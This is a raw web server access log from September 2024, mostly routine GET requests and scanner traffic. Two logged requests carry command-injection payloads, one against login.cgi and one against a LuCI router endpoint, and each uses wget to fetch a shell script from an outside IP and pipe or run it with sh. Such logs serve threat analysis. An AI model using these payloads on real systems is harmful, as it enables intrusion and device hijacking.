185.191.126.213 - - [02/Sep/2024:05:35:29 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
185.191.126.213 - - [02/Sep/2024:05:37:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
149.50.103.48 - - [02/Sep/2024:05:41:14 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
178.211.139.188 - - [02/Sep/2024:05:42:09 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
149.50.103.48 - - [02/Sep/2024:05:45:18 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
185.191.126.213 - - [02/Sep/2024:05:46:33 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
89.190.156.137 - - [02/Sep/2024:05:48:03 +0200] "GET / HTTP/1.0" 200 1229 "-" "ivre-masscan/1.3 https://github.com/robertdavidgraham/"
35.92.110.115 - - [02/Sep/2024:05:49:06 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36"
35.92.17.190 - - [02/Sep/2024:05:49:22 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36"
198.235.24.201 - - [02/Sep/2024:05:51:57 +0200] "\x16\x03\x01" 501 318 "-" "-"
198.235.24.201 - - [02/Sep/2024:05:51:58 +0200] "\x16\x03\x01" 501 318 "-" "-"
185.191.126.213 - - [02/Sep/2024:05:55:53 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
93.174.93.12 - - [02/Sep/2024:05:57:55 +0200] "GET / HTTP/1.0" 200 1229 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 10_0 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) GSA/18.0.130791545 Mobile/14A5345a Safari/600.1.4"
37.139.5.66 - - [02/Sep/2024:05:59:05 +0200] "GET /login.cgi?cli=aa%20aa%27;wget%20http://193.35.18.164/klausschwab.sh%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1" 400 329 "-" "linus-torvalds-loves-you"
52.41.4.251 - - [02/Sep/2024:06:00:47 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36"
93.174.93.12 - - [02/Sep/2024:06:00:50 +0200] "GET / HTTP/1.0" 200 1229 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 10_0 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) GSA/18.0.130791545 Mobile/14A5345a Safari/600.1.4"
178.211.139.188 - - [02/Sep/2024:06:01:10 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
178.211.139.188 - - [02/Sep/2024:06:01:34 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
178.211.139.188 - - [02/Sep/2024:06:01:47 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
178.211.139.188 - - [02/Sep/2024:06:04:58 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
89.190.156.137 - - [02/Sep/2024:06:05:13 +0200] "GET / HTTP/1.0" 200 1229 "-" "ivre-masscan/1.3 https://github.com/robertdavidgraham/"
141.255.160.234 - - [02/Sep/2024:06:05:35 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
185.224.128.59 - - [02/Sep/2024:06:07:09 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60wget+-O-+http%3A%2F%2F154.216.17.171%3A88%2Ft%7Csh%3B%60) HTTP/1.1" 404 331 "-" "Go-http-client/1.1"
95.214.52.167 - - [02/Sep/2024:06:07:46 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
185.191.126.213 - - [02/Sep/2024:06:07:59 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
